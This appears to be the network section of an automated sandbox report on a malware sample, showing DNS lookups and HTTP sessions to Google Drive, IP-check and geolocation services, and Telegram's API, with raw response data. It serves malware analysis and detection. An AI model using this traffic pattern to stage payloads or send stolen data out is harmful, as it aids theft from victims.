                                                                                                          Jan 11, 2025 03:07:01.457978964 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:01.458550930 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:01.463217020 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:01.464626074 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:01.468206882 CET8049779132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.468266010 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:01.469504118 CET8049781132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.469593048 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:01.469693899 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:01.474426985 CET8049781132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.299186945 CET8049781132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.305006981 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:02.305046082 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.305140972 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:02.305527925 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:02.305537939 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.345037937 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:02.955689907 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.957612991 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:02.957640886 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:02.957714081 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:02.957720995 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:03.214999914 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:03.215080023 CET44349782149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:03.215156078 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:05.860783100 CET49782443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:05.863830090 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:05.864190102 CET4978380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:05.868999958 CET8049781132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:05.869044065 CET8049783132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:05.869090080 CET4978180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:05.869141102 CET4978380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:05.869218111 CET4978380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:05.873950005 CET8049783132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:06.698160887 CET8049783132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:06.751249075 CET4978380192.168.2.10132.226.8.169

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 03:05:21.900881052 CET6515353192.168.2.101.1.1.1
                                                                                                          Jan 11, 2025 03:05:21.907567978 CET53651531.1.1.1192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.301553011 CET6105253192.168.2.101.1.1.1
                                                                                                          Jan 11, 2025 03:05:23.308876038 CET53610521.1.1.1192.168.2.10
                                                                                                          Jan 11, 2025 03:05:27.245166063 CET4919653192.168.2.101.1.1.1
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET53491961.1.1.1192.168.2.10
                                                                                                          Jan 11, 2025 03:05:28.897032976 CET6112153192.168.2.101.1.1.1
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET53611211.1.1.1192.168.2.10
                                                                                                          Jan 11, 2025 03:05:35.251332045 CET5979353192.168.2.101.1.1.1
                                                                                                          Jan 11, 2025 03:05:35.257931948 CET53597931.1.1.1192.168.2.10

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 03:05:21.900881052 CET192.168.2.101.1.1.10x8ef5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:23.301553011 CET192.168.2.101.1.1.10xc454Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.245166063 CET192.168.2.101.1.1.10x613dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.897032976 CET192.168.2.101.1.1.10xa935Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:35.251332045 CET192.168.2.101.1.1.10x284fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 03:05:21.907567978 CET1.1.1.1192.168.2.100x8ef5No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:23.308876038 CET1.1.1.1192.168.2.100xc454No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:27.252181053 CET1.1.1.1192.168.2.100x613dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:28.907454014 CET1.1.1.1192.168.2.100xa935No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 03:05:35.257931948 CET1.1.1.1192.168.2.100x284fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.1049710132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:27.264302015 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:28.078248024 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:27 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 11, 2025 03:05:28.083086014 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 03:05:28.387295961 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 11, 2025 03:05:34.965766907 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 03:05:35.246803045 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.1049713132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:37.867239952 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 03:05:40.796513081 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:40 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.1049715132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:41.637671947 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:44.534039021 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:44 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.1049717132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:45.418610096 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:49.278007984 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Sat, 11 Jan 2025 02:05:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.1049718132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:49.287935972 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:51.116115093 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.1049721132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:52.025201082 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:53.969919920 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:53 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.1049723132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:54.878374100 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:05:58.729590893 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Sat, 11 Jan 2025 02:05:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.1049724132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:05:58.739515066 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:01.571975946 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:01 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.1049726132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:02.389221907 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:06.283741951 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Sat, 11 Jan 2025 02:06:06 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.1049727132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:06.295854092 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:10.363274097 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Sat, 11 Jan 2025 02:06:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
